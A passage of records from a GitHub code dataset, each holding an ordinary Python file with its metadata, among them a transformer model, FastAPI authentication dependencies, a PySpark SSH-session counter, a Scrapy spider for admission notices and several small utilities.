# Discrete vertex value embeddings\n self.embed = Embedder(classes, self.embed_dim)\n \n # Transformer decoder\n decoder_layers = TransformerDecoderLayerImproved(d_model=self.embed_dim, \n dim_feedforward= config['hidden_dim'],\n nhead=config['num_heads'], dropout=self.dropout)\n decoder_norm = LayerNorm(self.embed_dim)\n self.decoder = TransformerDecoder(decoder_layers, config['num_layers'], decoder_norm)\n self.fc = nn.Linear(self.embed_dim, classes)\n \n\n def forward(self, code):\n \"\"\" forward pass \"\"\"\n if code[0] is None:\n bs = len(code)\n seq_len = 0\n else:\n bs, seq_len = code.shape[0], code.shape[1]\n\n # Context embedding values\n context_embedding = torch.zeros((bs, 1, self.embed_dim)).cuda() # [bs, 1, dim]\n \n if seq_len > 0:\n embeddings = self.embed(code.flatten()).view(bs, code.shape[1], self.embed_dim) # [bs, seqlen, dim]\n decoder_inputs = torch.cat([context_embedding, embeddings], axis=1) # [bs, seqlen+1, dim]\n # Positional embedding\n decoder_inputs = self.pos_embed(decoder_inputs.transpose(0,1)) # [seqlen+1, bs, dim]\n \n else:\n decoder_inputs = self.pos_embed(context_embedding.transpose(0,1)) # [1, bs, dim]\n \n memory = torch.zeros((1, bs, self.embed_dim)).cuda()\n nopeak_mask = torch.nn.Transformer.generate_square_subsequent_mask(decoder_inputs.shape[0]).cuda() # masked with -inf\n decoder_outputs = self.decoder(tgt=decoder_inputs, memory=memory, memory_key_padding_mask=None,\n tgt_mask=nopeak_mask, tgt_key_padding_mask=None)\n \n # Get logits \n logits = self.fc(decoder_outputs)\n return logits.transpose(0,1)\n \n\n def sample(self, n_samples=10):\n \"\"\"\n sample from distribution (top-k, top-p)\n \"\"\"\n #samples = []\n temperature = 1.0\n top_k = 0\n top_p = SAMPLE_PROB\n\n for k in range(self.max_len):\n if k == 0:\n v_seq = [None] * n_samples\n \n # pass through decoder\n with torch.no_grad():\n logits = self.forward(code=v_seq)\n logits = logits[:, -1, :] / temperature\n \n # Top-p sampling \n next_vs = []\n for logit in logits: \n filtered_logits = top_k_top_p_filtering(logit.clone(), top_k=top_k, top_p=top_p)\n next_v = torch.multinomial(F.softmax(filtered_logits, dim=-1), 1)\n next_vs.append(next_v.item())\n\n # Add next tokens\n next_seq = torch.LongTensor(next_vs).view(len(next_vs), 1).cuda()\n if v_seq[0] is None:\n v_seq = next_seq\n else:\n v_seq = torch.cat([v_seq, next_seq], 1)\n \n return v_seq\n\n\n\nclass CondARModel(nn.Module):\n \"\"\"Autoregressive generative model of quantized mesh vertices.\"\"\"\n\n def __init__(self,\n config,\n max_len=8,\n classes = 512,\n name='ar_model'):\n super(CondARModel, self).__init__()\n\n self.embed_dim = config['embed_dim']\n self.max_len = max_len\n self.dropout = config['dropout_rate']\n\n # Position embeddings\n self.pos_embed = PositionalEncoding(max_len=self.max_len, d_model=self.embed_dim)\n \n # Discrete vertex value embeddings\n self.code_embed = Embedder(classes, self.embed_dim)\n self.cond_embed = Embedder(classes, self.embed_dim)\n \n # Transformer decoder\n decoder_layers = TransformerDecoderLayerImproved(d_model=self.embed_dim, \n dim_feedforward= config['hidden_dim'],\n nhead=config['num_heads'], dropout=self.dropout)\n decoder_norm = LayerNorm(self.embed_dim)\n self.decoder = TransformerDecoder(decoder_layers, config['num_layers'], decoder_norm)\n self.fc = nn.Linear(self.embed_dim, classes)\n \n\n def forward(self, code, cond):\n \"\"\" forward pass \"\"\"\n if code[0] is None:\n bs = len(code)\n seq_len = 0\n else:\n bs, seq_len = code.shape[0], code.shape[1]\n\n # Context embedding\n context_embedding = torch.zeros((bs, 1, self.embed_dim)).cuda() # [bs, 1, dim]\n \n # Code seq embedding \n if seq_len > 0:\n embeddings = self.code_embed(code.flatten()).view(bs, code.shape[1], self.embed_dim) # [bs, seqlen, dim]\n decoder_inputs = torch.cat([context_embedding, embeddings], axis=1) # [bs, seqlen+1, dim]\n # Positional embedding\n decoder_inputs = self.pos_embed(decoder_inputs.transpose(0,1)) # [seqlen+1, bs, dim]\n else:\n decoder_inputs = self.pos_embed(context_embedding.transpose(0,1)) # [1, bs, dim]\n\n # Cond input embedding \n cond_input = self.cond_embed(cond.flatten()).view(bs, cond.shape[1], self.embed_dim) # [bs, seqlen, dim]\n \n # Pass through AR decoder\n memory = cond_input.transpose(0,1)\n nopeak_mask = torch.nn.Transformer.generate_square_subsequent_mask(decoder_inputs.shape[0]).cuda() # masked with -inf\n decoder_outputs = self.decoder(tgt=decoder_inputs, memory=memory, tgt_mask=nopeak_mask)\n \n # Get logits \n logits = self.fc(decoder_outputs)\n return logits.transpose(0,1)\n\n\n def sample(self, n_samples, cond_code):\n \"\"\"\n sample from distribution (top-k, top-p)\n \"\"\"\n temperature = 1.0\n top_k = 0\n top_p = SAMPLE_PROB\n\n for k in range(self.max_len):\n if k == 0:\n v_seq = [None] * n_samples\n \n # pass through decoder\n with torch.no_grad():\n logits = self.forward(code=v_seq, cond=cond_code)\n logits = logits[:, -1, :] / temperature\n \n # Top-p sampling \n next_vs = []\n for logit in logits: \n filtered_logits = top_k_top_p_filtering(logit.clone(), top_k=top_k, top_p=top_p)\n next_v = torch.multinomial(F.softmax(filtered_logits, dim=-1), 1)\n next_vs.append(next_v.item())\n\n # Add next tokens\n next_seq = torch.LongTensor(next_vs).view(len(next_vs), 1).cuda()\n if v_seq[0] is None:\n v_seq = next_seq\n else:\n v_seq = torch.cat([v_seq, next_seq], 1)\n \n return v_seq\n","repo_name":"samxuxiang/SkexGen","sub_path":"model/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":9167,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"37"} +{"seq_id":"37460394752","text":"# -*- coding=utf-8 -*-\n# @Time : 2023/01/23 20:25\n# @Author : ╰☆H.俠ゞ\n# =============================================================\nfrom MStudent.autoTest_banXia.todo_dev.students import Stu\n\n\nclass FileOp:\n\n def __init__(self):\n self.file = r'/autoTest_banXia/todo_dev\\data.txt'\n\n # 读取\n def read(self): # 根据业务要求,处理成字典格式的中间数据 stu_dict = {id: stu}\n stu_dict = {}\n with open(self.file, mode='r', encoding='utf-8') as f:\n # print(f.readlines())\n for readline in f.readlines():\n line_split = readline.split(\",\")\n id = line_split[0]\n name = line_split[1]\n phone = line_split[2]\n qq = line_split[3]\n score = line_split[4].strip() # 默认删除当前字符串的首尾的空格和换行符\n stu = Stu(id, name, phone, qq, score)\n stu_dict[id] = stu\n return stu_dict\n\n # 写入\n def write(self, stu_dict: dict):\n with open(self.file, mode='w', encoding='utf-8') as f: # mode = 'w' ,覆盖写入\n for stu in stu_dict.values():\n f.write(str(stu)) # 强制转化为字符串,将Stu类实例转化为str类实例\n f.write('\\n')\n\n\nif __name__ == '__main__':\n print(FileOp().read())","repo_name":"superlff888/projectScripts","sub_path":"MStudent/autoTest_banXia/todo_dev/file_test.py","file_name":"file_test.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13915432847","text":"\"\"\"\n ____ ____ _ __ __ ____ ___\n | _ \\| _ \\ / \\ | \\/ |/ ___/ _ \\\n | | | | |_) | / _ \\ | |\\/| | | | | | |\n | |_| | _ < / ___ \\| | | | |__| |_| |\n |____/|_| \\_\\/_/ \\_\\_| |_|\\____\\___/\n research group\n dramco.be/\n\n KU Leuven - Technology Campus Gent,\n Gebroeders De Smetstraat 1,\n B-9000 Gent, Belgium\n\n File: plt_heatmap.py\n Created: 2018-10-30\n Author: Gilles Callebaut\n Description:\n\"\"\"\n\nimport os\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom matplotlib.ticker import ScalarFormatter, FormatStrFormatter\nimport numpy as np\nimport pandas as pd\nfrom scipy import stats\nimport seaborn as sns\n\nfrom math import sqrt\nSPINE_COLOR = 'gray'\n\nimport util as util\n\n\ndef latexify(fig_width=None, fig_height=None, columns=1):\n \"\"\"Set up matplotlib's RC params for LaTeX plotting.\n Call this before plotting a figure.\n\n Parameters\n ----------\n fig_width : float, optional, inches\n fig_height : float, optional, inches\n columns : {1, 2}\n \"\"\"\n\n # code adapted from http://www.scipy.org/Cookbook/Matplotlib/LaTeX_Examples\n\n # Width and max height in inches for IEEE journals taken from\n # computer.org/cms/Computer.org/Journal%20templates/transactions_art_guide.pdf\n\n assert(columns in [1, 2])\n\n if fig_width is None:\n fig_width = 2.7 if columns == 1 else 6.9 # width in inches\n\n if fig_height is None:\n golden_mean = (sqrt(5)-1.0)/2.0 # Aesthetic ratio\n fig_height = fig_width*golden_mean # height in inches\n\n MAX_HEIGHT_INCHES = 8.0\n if fig_height > MAX_HEIGHT_INCHES:\n print(\"WARNING: fig_height too large:\" + fig_height +\n \"so will reduce to\" + MAX_HEIGHT_INCHES + \"inches.\")\n fig_height = MAX_HEIGHT_INCHES\n\n params = {\n # 'backend': 'ps',\n\n 'axes.labelsize': 8,\n 'axes.titlesize': 8,\n 'legend.fontsize': 8, # was 10\n 'xtick.labelsize': 8,\n 'ytick.labelsize': 8,\n # 'text.usetex': True,\n # \"pgf.rcfonts\": False,\n # \"pgf.texsystem\": \"pdflatex\",\n 'figure.figsize': [fig_width, fig_height],\n 'font.family': 'serif'\n }\n\n mpl.rcParams.update(params)\n\n\ndef format_axes(ax):\n\n for spine in ['top', 'right']:\n ax.spines[spine].set_visible(False)\n\n for spine in ['left', 'bottom']:\n ax.spines[spine].set_color(SPINE_COLOR)\n ax.spines[spine].set_linewidth(0.5)\n\n ax.xaxis.set_ticks_position('bottom')\n ax.yaxis.set_ticks_position('left')\n\n for axis in [ax.xaxis, ax.yaxis]:\n axis.set_tick_params(direction='out', color=SPINE_COLOR)\n\n return ax\n\n\nlatexify()\n\n\ncurrentDir = os.path.dirname(os.path.abspath(__file__))\ninput_path = os.path.abspath(os.path.join(\n currentDir, '..', 'result'))\ninput_file = \"preprocessed_data.pkl\"\ninput_file_path = os.path.join(input_path, input_file)\n\n# output_fig_pdf = os.path.join(\n# input_path, 'path_loss_model.pdf'.format(time_string_file))\n# output_fig_pgf = os.path.join(\n# input_path, 'path_loss_model.pgf'.format(time_string_file))\n\ndf = pd.read_pickle(input_file_path)\ndf = util.onlyPackets(df)\n\nsns.distplot(df.rss, kde=False, rug=True);\n\nplt.show()\n\n","repo_name":"DRAMCO/LoRaCoverageMeasurements","sub_path":"processing/plot_histogram_rss.py","file_name":"plot_histogram_rss.py","file_ext":"py","file_size_in_byte":3290,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"30805138537","text":"import random\r\nwhile True:\r\n a =int (input(\"quantos jogos:\"))\r\n if a == 0:\r\n quit()\r\n for y in range(1,a+1):\r\n print(\"jogo\",y,\":\")\r\n num=\" \"\r\n for b in range(1,15):\r\n c=random.randint(0,25)\r\n num=num+\" \"+str(c)\r\n print(num)\r\n \r\n","repo_name":"DaviAstorino/linuxpython","sub_path":"mega.py","file_name":"mega.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30680499915","text":"from sqlalchemy.orm import Session\nfrom fastapi import Depends, HTTPException, status\nfrom fastapi.security import OAuth2PasswordBearer\nfrom jose import JWTError\n\nfrom app import models\n\nfrom .security import AccessToken, get_user\nfrom .db import SessionLocal\n\n\noauth2_scheme = OAuth2PasswordBearer(tokenUrl=\"/api/auth/token\")\npermission_exception = HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED,\n detail=\"User does not have sufficient permissions\",\n)\n\n\ndef get_db():\n db = SessionLocal()\n try:\n yield db\n finally:\n db.close()\n\n\nasync def get_current_user(\n token: str = Depends(oauth2_scheme), db: Session = Depends(get_db)\n) -> models.User:\n \"\"\"Dependancy to obtain the currently authenticated user.\n If no authetication is present, a 401 will be returned\n \"\"\"\n credentials_exception = HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED,\n detail=\"Could not validate credentials\",\n headers={\"WWW-Authenticate\": \"Bearer\"},\n )\n try:\n payload = AccessToken.decode(token)\n username: str = payload.get(\"sub\")\n if username is None:\n raise credentials_exception\n\n except JWTError as e:\n raise credentials_exception from e\n\n user = get_user(db, username=username)\n if user is None:\n raise credentials_exception\n return user\n\n\nasync def current_user_is_manager(\n user: models.User = Depends(get_current_user),\n) -> models.User:\n if user.is_manager:\n return user\n else:\n raise permission_exception\n\n\nasync def current_user_is_sponsor(\n user: models.User = Depends(get_current_user),\n) -> models.User:\n if user.is_sponsor or user.is_manager:\n return user\n else:\n raise permission_exception\n\n\nasync def current_user_is_drinkmeister(\n user: models.User = Depends(get_current_user),\n) -> models.User:\n if user.is_drink_meister or user.is_manager:\n return user\n else:\n raise permission_exception","repo_name":"3450-Group-3/PuttPuttGolf","sub_path":"app/dependancies.py","file_name":"dependancies.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17383916159","text":"# import required libraries\r\nimport random\r\n\r\n# define bot's responses\r\nresponses = {\r\n \"hi\": [\"Hello!\", \"Hi there!\", \"Hi! How can I assist you?\"],\r\n \"bye\": [\"Goodbye!\", \"See you later!\", \"Bye! Have a great day.\"],\r\n \"default\": [\"I'm sorry, I didn't understand what you meant. Can you please rephrase?\", \r\n \"I'm not sure what you mean. Could you please provide more context?\"]\r\n}\r\n\r\n# define function to generate bot's response\r\ndef get_bot_response(user_message):\r\n if user_message in responses:\r\n return random.choice(responses[user_message])\r\n else:\r\n return random.choice(responses[\"default\"])\r\n\r\n# start chatting with the bot\r\nwhile True:\r\n user_message = input(\"You: \")\r\n if user_message.lower() == \"quit\":\r\n break\r\n bot_response = get_bot_response(user_message.lower())\r\n print(\"Bot: \" + bot_response)","repo_name":"YashM0304/AI-Practicals","sub_path":"chatbot.py","file_name":"chatbot.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"6873198361","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def tree2str(self, root: Optional[TreeNode]) -> str:\n \n def construct(node):\n if not node: return \"\"\n lr=\"\"\n if node.left and node.right:\n lr=\"(\"+construct(node.left)+\")\"+\"(\"+construct(node.right)+\")\"\n if node.left and not node.right:\n lr=\"(\"+construct(node.left)+\")\"\n if not node.left and node.right:\n lr=\"()\"+\"(\"+construct(node.right)+\")\"\n return str(node.val)+lr\n \n return construct(root)\n ","repo_name":"akkinasrikar/leetcode-problems","sub_path":"606-construct-string-from-binary-tree/606-construct-string-from-binary-tree.py","file_name":"606-construct-string-from-binary-tree.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16465041750","text":"from pyspark import SparkContext, SparkConf\nfrom datetime import date, timedelta\n\nconf = SparkConf().setAppName(\"session_count\").setMaster(\"local[2]\")\nconf.set(\"spark.broadcast.compress\", \"false\")\nconf.set(\"spark.shuffle.compress\", \"false\")\nconf.set(\"spark.shuffle.spill.compress\", \"false\")\nsc = SparkContext(conf=conf)\n# No. of unique users using labs in a day, week & month.\n# u'Jul 29 03:32:28 gw02 sshd[13697]: pam_unix(sshd:session): session opened for user yuvankishore6 by (uid=0)'\n\nmonths = [\"Jan\", \"Feb\", \"Mar\", \"Apr\", \"May\", \"Jun\", \"Jul\", \"Aug\", \"Sep\", \"Oct\", \"Nov\", \"Dec\"] # .index()\n# monInNumber = input()\nmonInNumber = 7\ndayOfMonth = 29\n\n\n# this will extract the dates in a given week (1 - 52)\ndef extract_dates(year, week):\n dates = []\n dt = date(year, 1, 1)\n if dt.weekday() > 3:\n dt = dt + timedelta(7 - dt.weekday())\n else:\n dt = dt - timedelta(dt.weekday())\n dlt = timedelta(days=(week - 1) * 7)\n for i in range(0, 7):\n Date = dt + dlt + timedelta(days=i)\n dates.append(str(Date))\n return dates\n\n# extracting 30th week of the year 2018\nfulldateList = extract_dates(2018, 30)\n# extracting date and month into separate list\ndateList = []\nmonthList = []\nfor i in range(0, len(fulldateList)):\n dateList.append(fulldateList[i][8:])\n x = int(fulldateList[i][5:7])\n if months[x - 1] not in monthList:\n monthList.append(months[x - 1])\n\nsecureLog = sc.textFile(\"c:\\\\data\\\\secureMixed2.log\").persist() # 1018875\n# filtering ssh logs\nsshdFilter = secureLog.filter(lambda sl: (str(sl.split(\" \")[4])[:4] == \"sshd\")) # 1018875\n# filtering opened session logs from previous rdd\nopenedFilter = sshdFilter.filter(lambda ocf: str(ocf.split(\" \")[7]).lower() == \"opened\") # 4899\n# -------------------------------------------------\n# no of unique users using lab in a day\n# filtering logs by date of a month\nopenedDayByFilter = openedFilter.filter(\n lambda odbf: (odbf.split(\" \")[0] == months[monInNumber - 1]) and (odbf.split(\" \")[1] == str(dayOfMonth))) # 163\n# extracting unique user names from previous rdd\nuniqueUsersListByDay = openedDayByFilter.mapPartitions(lambda uulbd: (uulbd.split(\" \")[10])).distinct() # 39\n# -------------------------------------------------\n# no of unique users using lab in a month\n# filtering logs by month\nopenedMonthByFilter = openedFilter.filter(lambda ombf: ombf.split(\" \")[0] == months[monInNumber - 1]) # 4899\n# extracting unique user names from previous rdd\nuniqueUsersListByMonth = openedDayByFilter.map(lambda uulbm: (uulbm.split(\" \")[10])).distinct() # 39\n# -------------------------------------------------\n# no of unique users using lab in a week\n# filtering logs by dates of the given week\nopenedWeekByFilter = openedFilter.filter(\n lambda owbf: (owbf.split(\" \")[0] in monthList and owbf.split(\" \")[1] in dateList)) # 1625\n# extracting unique user names from previous rdd\nuniqueUsersListByWeek = openedWeekByFilter.map(lambda uulbw: (uulbw.split(\" \")[10])).distinct() # 120\n","repo_name":"vimalathi/pySpark","sub_path":"syslogAnalysis/src/main/totalSessionCount.py","file_name":"totalSessionCount.py","file_ext":"py","file_size_in_byte":3000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"239252174","text":"import re\n\n\ndef LCSBackTrack(v, w):\n # Initialize the matrices.\n n = len(v)\n m = len(w)\n #分数\n s = []\n for i in range(n + 1):\n s.append([])\n for j in range(m + 1):\n s[i].append(0)\n #方向\n Backtrack = []\n for i in range(n):\n Backtrack.append([])\n for j in range(m):\n Backtrack[i].append(\"\")\n\n\n #print(s)\n #print(Backtrack)\n\n#填充分数和方向\n for i in range(1, n+1):\n for j in range(1, m+1):\n if v[i-1] == w[j-1]:\n s[i][j] = s[i-1][j-1]+1\n\n else:\n shu = s[i-1][j]-1\n heng=s[i][j-1]-1\n mismatch = s[i-1][j-1]-1\n s[i][j] = max(heng,shu,mismatch)\n\n\n\n\n if s[i][j] == s[i-1][j]-1:\n Backtrack[i-1][j-1] = \"↓\"\n\n elif s[i][j] == s[i][j-1]-1:\n Backtrack[i-1][j-1] = \"→\"\n\n elif s[i][j] == s[i-1][j-1]-1 or s[i][j] == s[i - 1][j - 1]+1:\n Backtrack[i - 1][j - 1] = \"↘\"\n\n\n\n#获取最后一列的最大值,以及出现最大值的最早的位置\n i = max(enumerate( [s[row][m] for row in range(m, n+1)] ), key=lambda x: x[1])[0]+ m #为什么要加m,是因为基地是m,开始,但排序从0开始。\n max_score = str(s[i][m])\n\n\n print(s)\n print(max_score,i)\n print(Backtrack)\n return Backtrack,i,m\n\n\n# Backtrack to start of the fitting alignment.\n\n# ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\ndef OutputLCS(backtrack,v,w,i,j):\n insert_indel = lambda word, i: word[:i] + '-' + word[i:]\n\n #LCS_V=''\n #LCS_W=''\n #print(v,w,i,j)\n #global s\n #print(v,w,i,j)\n #print(backtrack)\n\n while i*j>0:\n print(i,j)\n print(backtrack[i][j])\n if backtrack[i][j] == \"↓\":\n i -= 1\n w = insert_indel(w, j+1)\n\n\n elif backtrack[i][j] == \"→\":\n j -= 1\n v = insert_indel(v, i+1)\n\n elif backtrack[i][j] == \"↘\":\n i-=1\n j-=1\n\n print(i,j)\n print(w)\n print(v)\n print(i,j)\n return v[i:],w\n\n\n\n\n\nV= input(\"what is the v string:\") # two nucleotide strings v and w, where v has length at most 1000 and w has length at most 100.\nW= input(\"what is the w string:\")\n#V=\"CGTGACTGGCTGATACTTTCTCCGTTATCCCTGTTCATTACAAATATATTAAAAGCGCTACCTGTGCTATTCATTTAGCCTCTCCCTCGTCGCCTAGGAACGTGAGAAGGGAAGCGAGATTCTAACCACGCACCGAGCTTCAGTGTACATCGGTACATCGTTACGGCATCCCTGATTTAAAGACGAAGTATGTTAAGCATCGGGCCGTGCGCTTGGCAGAGAAGTAATCGGGATGTAGCCGAAAAGGTTAGCACAGACTAGTCAGAAATCGTGTATTGCCTAAGCACTAAGAGAACGTGAAAGACCCGTATCGAGGGACAAGGGCACGGAAGTTAACACGACAGGGAAGGTCTCCCGCAGCTACCGCTATTATGGTGCCAGACAGGCGATATTTCCAGGACGCTGGTTAGTGCTTGGGAGAACGAGCGCAATATTTTTTGATGCTTCCATATCGACCAATTAATGACAATTTTAGATCCGGCACTCACCCTAGGCGGAGTCCATGAACTAAGGAATTCCAGCTGCTATTGCACCACCAATAATGACGTTCATTAGTGACGGAGCAAAGTGTGTTGTATCGTTAATGGTTATTTTCATGGGCTGTACATTAGGCGTAAGACCTAGCGGTAGGGCTGCTTTATGCAGGTACTCCCGTACTGAACAATAGCTACATCTGTTCGAGGACTCTCTGGGACCCTCCGTCCCCAGATCGAAGACCCCGACAGCAATACGTACACGAGTTTTTCCTGGCATTATCCTTAAGAATCAATGTGTCCAATCTTCTTCCTTTAATGCAGTAGAACGGTAGTGCGGGGGACGTGGATCCCTGGTGTGTTGGACTTGAAAGACTTGGTCGTTACTCCTTTGGATATCCG\"\n#W=\"GCAACTATCTACAGACCATAGGCAGAGGTCCATCGTGTACGTACAAGACTCTCGATCCCGGTTTTTTAAAGGGGAAAGCAAATGT\"\n#V=\"GTAGGCTTAAGGTTA\"\n#W=\"TAGATA\"\nBacktrack, n, m = LCSBackTrack(V, W)\n#print(Backtrack,n,m)\nprint(V[:n],W,n-1,m-1)\n\nprint('\\n'.join(OutputLCS(Backtrack,V[:n],W,n-1,m-1)))\n\n","repo_name":"Hydebutterfy/learn-python","sub_path":"Comparing Genes, Proteins, and Genomes/Fitting Alignment Problem-低级版.py","file_name":"Fitting Alignment Problem-低级版.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25401617082","text":"import cv2\nimport numpy as np\n\ndef imdecode(data):\n if isinstance(data, bytes):\n data = np.fromstring(data, np.uint8)\n img = cv2.imdecode(data, cv2.IMREAD_UNCHANGED)\n return img[...,::-1]\n\ndef imread(filename):\n img = cv2.imread(filename, cv2.IMREAD_UNCHANGED)\n return img[...,::-1]\n\ndef imwrite(filename, img):\n if img is not None:\n if len(img.shape) > 2:\n img = img[...,::-1]\n return cv2.imwrite(filename, img)\n\ndef safe_crop(arr, tblr, fill=None):\n n,s,w,e = tblr\n shape = np.asarray(arr.shape)\n shape[:2] = s - n, e - w\n no, so, wo, eo = 0, shape[0], 0, shape[1]\n if n < 0:\n no += -n\n n = 0\n if w < 0:\n wo += -w\n w = 0\n if s >= arr.shape[0]:\n so -= s - arr.shape[0]\n s = arr.shape[0]\n if e >= arr.shape[1]:\n eo -= e - arr.shape[1]\n e = arr.shape[1]\n cropped = arr[n:s,w:e]\n if fill is None:\n return cropped\n out = np.empty(shape, dtype=arr.dtype)\n out.fill(fill)\n try:\n out[no:so,wo:eo] = cropped\n except ValueError:\n # this happens when there is no overlap\n pass\n return out","repo_name":"lmccart/vibe-check","sub_path":"face/imutil.py","file_name":"imutil.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"2672206469","text":"\"\"\"API base class.\"\"\"\n\nfrom collections.abc import Callable\nimport logging\nfrom typing import TYPE_CHECKING, Any\n\nif TYPE_CHECKING:\n from . import ResourceGroup\n\nLOGGER = logging.getLogger(__name__)\n\nSubscriptionType = Callable[..., None]\nUnsubscribeType = Callable[[], None]\n\n\nclass APIItem:\n \"\"\"Base class for a deCONZ API item.\"\"\"\n\n resource_group: \"ResourceGroup\"\n\n def __init__(self, resource_id: str, raw: Any) -> None:\n \"\"\"Initialize API item.\"\"\"\n self.resource_id = resource_id\n self.raw = raw\n\n self.changed_keys: set[str] = set()\n\n self._callbacks: list[SubscriptionType] = []\n self._subscribers: list[SubscriptionType] = []\n\n @property\n def deconz_id(self) -> str:\n \"\"\"Id to call device over API e.g. /sensors/1.\"\"\"\n return f\"/{self.resource_group.value}/{self.resource_id}\"\n\n def register_callback(self, callback: SubscriptionType) -> None:\n \"\"\"Register callback for signalling.\"\"\"\n self._callbacks.append(callback)\n\n def remove_callback(self, callback: SubscriptionType) -> None:\n \"\"\"Remove callback previously registered.\"\"\"\n if callback in self._callbacks:\n self._callbacks.remove(callback)\n\n def subscribe(self, callback: SubscriptionType) -> UnsubscribeType:\n \"\"\"Subscribe to events.\n\n Return function to unsubscribe.\n \"\"\"\n self._subscribers.append(callback)\n\n def unsubscribe() -> None:\n \"\"\"Unsubscribe callback.\"\"\"\n self._subscribers.remove(callback)\n\n return unsubscribe\n\n def update(self, raw: dict[str, dict[str, Any]]) -> None:\n \"\"\"Update input attr in self.\n\n Store a set of keys with changed values.\n \"\"\"\n changed_keys = set()\n\n for k, v in raw.items():\n changed_keys.add(k)\n\n if isinstance(self.raw.get(k), dict) and isinstance(v, dict):\n changed_keys.update(set(v.keys()))\n self.raw[k].update(v)\n\n else:\n self.raw[k] = v\n\n self.changed_keys = changed_keys\n\n for callback in self._callbacks + self._subscribers:\n callback()\n","repo_name":"Kane610/deconz","sub_path":"pydeconz/models/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"37"} +{"seq_id":"14487162595","text":"import scrapy\n\n\nclass TjSpider(scrapy.Spider):\n name = 'tj'\n # allowed_domains = ['tiaoji.com']\n start_urls = ['http://www.chinakaoyan.com/tiaoji/schoollist/pagenum/1.shtml']\n\n def parse(self, response):\n links = response.xpath('//span[@class=\"title\"]/a/@href').getall()\n for link in links:\n # print(link)\n yield response.follow(url=link, callback=self.parse_detail)\n pages = response.xpath('//div[@class=\"dajax\"]/a/@href').getall()\n if pages:\n for one_page in pages:\n yield response.follow(url=one_page, callback=self.parse)\n\n def parse_detail(self, response):\n title = response.xpath('//div[@class=\"t-header\"]/h1/text()').get()\n s_name = response.xpath('//div[@class=\"student-info\"]/div[@class=\"s-item font16\"][1]/span[@class=\"name sw\"]/text()').get()\n\n loc = response.xpath('//div[@class=\"student-info\"]/div[@class=\"s-item font16\"][1]/span[@class=\"num\"]/text()').get()\n # print(title, s_name, loc)\n zhuanye = response.xpath('//div[@class=\"student-info\"]/div[@class=\"s-item font16\"][2]/span[@class=\"name sw\"]/text()').get()\n gonfei_num = response.xpath('//div[@class=\"student-info\"]/div[@class=\"s-item font16\"][2]/span[@class=\"num\"]/text()').get()\n # print(zhuanye, gonfei_num)\n release_time = response.xpath('//div[@class=\"student-info\"]/div[@class=\"s-item font16\"][3]/span[@class=\"name sw\"]/text()').get()\n end_time = response.xpath('//div[@class=\"student-info\"]/div[@class=\"s-item font16\"][3]/span[@class=\"num\"]/text()').get()\n # print(release_time, end_time)\n content_li = response.xpath('//div[@class=\"student-body font14\"]/p//text()').getall()\n content = '_'.join(x.strip() for x in content_li)\n # print(content)\n\n item = {}\n item['title'] = title\n item['s_name'] = s_name\n item['loc'] = loc\n item['zhuanye'] = zhuanye\n item['gonfei_num'] = gonfei_num\n item['release_time'] = release_time\n item['end_time'] = end_time\n item['content'] = content\n yield item","repo_name":"ykallan/chinakaoyan_school_info","sub_path":"zhongguokaoyanwang/spiders/tj.py","file_name":"tj.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"452778998","text":"#coding=utf8\n'''\nCreated on 2017-6-6\n\n@author: xuwei\n\n@summary: 任务管理器\n'''\nimport time\nimport tasks\nfrom timer import Wheel\nfrom timer.logger import Logger\n\nclass TaskManager(Logger):\n def __init__(self):\n Logger.__init__(self)\n self.tasks = {}\n self.Wheel = Wheel()\n \n def load_task(self):\n reload(tasks)\n for taskname in tasks.runtasks:\n if taskname not in self.tasks:\n try:\n self.tasks[taskname] = tasks.runtasks[taskname]\n module = __import__(taskname)\n self.Wheel.add_task(module, taskname, **tasks.runtasks[taskname])\n except:\n errmsg = self.get_error_message()\n self.logger.error(errmsg)\n time.sleep(3)\n else:\n if self.tasks[taskname] != tasks.runtasks[taskname]:\n try:\n self.Wheel.update_time(taskname, **tasks.runtasks[taskname])\n except:\n errmsg = self.get_error_message()\n self.logger.error(errmsg)\n \n def run(self):\n self.load_task()\n self.Wheel.start()\n time.sleep(10)\n while 1:\n try:\n self.load_task()\n except:\n errmsg = self.get_error_message()\n self.logger.error(errmsg)\n time.sleep(10)\n \nif __name__ == \"__main__\":\n TS = TaskManager()\n TS.run()\n \n","repo_name":"mudou192/TimerTask","sub_path":"manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"6527121791","text":"import 